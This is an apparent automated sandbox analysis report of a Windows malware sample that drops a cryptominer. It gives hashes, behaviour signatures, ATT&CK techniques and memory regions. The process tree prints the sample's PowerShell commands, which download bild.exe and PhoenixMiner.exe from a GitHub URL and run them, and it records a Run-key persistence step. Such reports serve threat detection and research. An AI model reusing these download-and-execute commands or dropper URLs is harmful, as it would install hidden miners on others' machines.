Analysis

  • max time kernel
    135s
  • max time network
    111s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    08-01-2021 18:39

General

  • Target

    3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe

  • Size

    8.3MB

  • MD5

    9ed9ad87a1564fbb5e1b652b3e7148c8

  • SHA1

    0c001b7e9615cbc22eac2a324d8deb7eaf069ff7

  • SHA256

    3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89

  • SHA512

    e49e403a73ff1d10111d23cc70ae95ffae63abbc4a52cfc52c447ee9f15e76ab44f07d0f41e3b3e63a73a07e7748b8ac7ed8c997f1051a10ca5fad1dace4183a

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/jkh36/d/main/bild.exe

exe.dropper

https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe

Signatures

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • JavaScript code in executable 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 56 IoCs
  • Suspicious use of SendNotifyMessage 56 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
    "C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4756
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:3340
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/jkh36/d/main/bild.exe,https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe -Destination lWr.exe,ck.exe;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4376
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command Start-Process lWr.exe; Start-Process ck.exe;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:888
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:3548

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

Peripheral Device Discovery

1
T1120

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    MD5

    6ed4b3d25a6f22e8dcef5167080ceb75

    SHA1

    b953ecc8de151b85f0b64784235a924b609582ca

    SHA256

    d4e932b7151d03a034cc4c0567082d2390fc791dc95b2a4d9a0623acbf4d2384

    SHA512

    80ef5c4be3611238fb1f15561fd1ae8101482e8b94897be141a0d9728851bc6edf3c497a619acef7ff481a5e45b24df5584b32979d9006cc2c1e61fd2aed9d9b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    16fdee964ab850fc1f650efa173b3e63

    SHA1

    451ab25448925a4c4e97424fa296d52684ad728f

    SHA256

    dea601f37ab9ce5de00358fc1afee4b7ea791c592ebe2d7a609b1a2e37e9485f

    SHA512

    a538243c945cbf5f0cb9cbf9c16d5687841da310cd2212834bc709b6213f36476ff9b51ff2d7b68c2f5e9835ba95f8da99c0d3dd3ba1e416acac295f3a1ea718

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • memory/888-42-0x0000000008D60000-0x0000000008D93000-memory.dmp
    Filesize

    204KB

  • memory/888-51-0x0000000009000000-0x0000000009001000-memory.dmp
    Filesize

    4KB

  • memory/888-50-0x0000000008EA0000-0x0000000008EA1000-memory.dmp
    Filesize

    4KB

  • memory/888-49-0x0000000008D40000-0x0000000008D41000-memory.dmp
    Filesize

    4KB

  • memory/888-24-0x0000000000000000-mapping.dmp
  • memory/888-53-0x0000000008FF0000-0x0000000008FF1000-memory.dmp
    Filesize

    4KB

  • memory/888-26-0x0000000071AD0000-0x00000000721BE000-memory.dmp
    Filesize

    6.9MB

  • memory/3340-3-0x0000000000000000-mapping.dmp
  • memory/3340-6-0x0000000072340000-0x00000000723D3000-memory.dmp
    Filesize

    588KB

  • memory/4376-10-0x0000000007990000-0x0000000007991000-memory.dmp
    Filesize

    4KB

  • memory/4376-15-0x0000000008080000-0x0000000008081000-memory.dmp
    Filesize

    4KB

  • memory/4376-18-0x00000000098B0000-0x00000000098B1000-memory.dmp
    Filesize

    4KB

  • memory/4376-19-0x00000000097E0000-0x00000000097E1000-memory.dmp
    Filesize

    4KB

  • memory/4376-20-0x0000000009840000-0x0000000009841000-memory.dmp
    Filesize

    4KB

  • memory/4376-21-0x0000000009E50000-0x0000000009E51000-memory.dmp
    Filesize

    4KB

  • memory/4376-22-0x0000000009A60000-0x0000000009A61000-memory.dmp
    Filesize

    4KB

  • memory/4376-23-0x0000000009B00000-0x0000000009B01000-memory.dmp
    Filesize

    4KB

  • memory/4376-16-0x0000000008AF0000-0x0000000008AF1000-memory.dmp
    Filesize

    4KB

  • memory/4376-17-0x00000000088B0000-0x00000000088B1000-memory.dmp
    Filesize

    4KB

  • memory/4376-14-0x0000000008210000-0x0000000008211000-memory.dmp
    Filesize

    4KB

  • memory/4376-13-0x00000000081A0000-0x00000000081A1000-memory.dmp
    Filesize

    4KB

  • memory/4376-12-0x00000000078D0000-0x00000000078D1000-memory.dmp
    Filesize

    4KB

  • memory/4376-11-0x0000000007730000-0x0000000007731000-memory.dmp
    Filesize

    4KB

  • memory/4376-9-0x0000000004DF0000-0x0000000004DF1000-memory.dmp
    Filesize

    4KB

  • memory/4376-8-0x0000000071AD0000-0x00000000721BE000-memory.dmp
    Filesize

    6.9MB

  • memory/4376-7-0x0000000000000000-mapping.dmp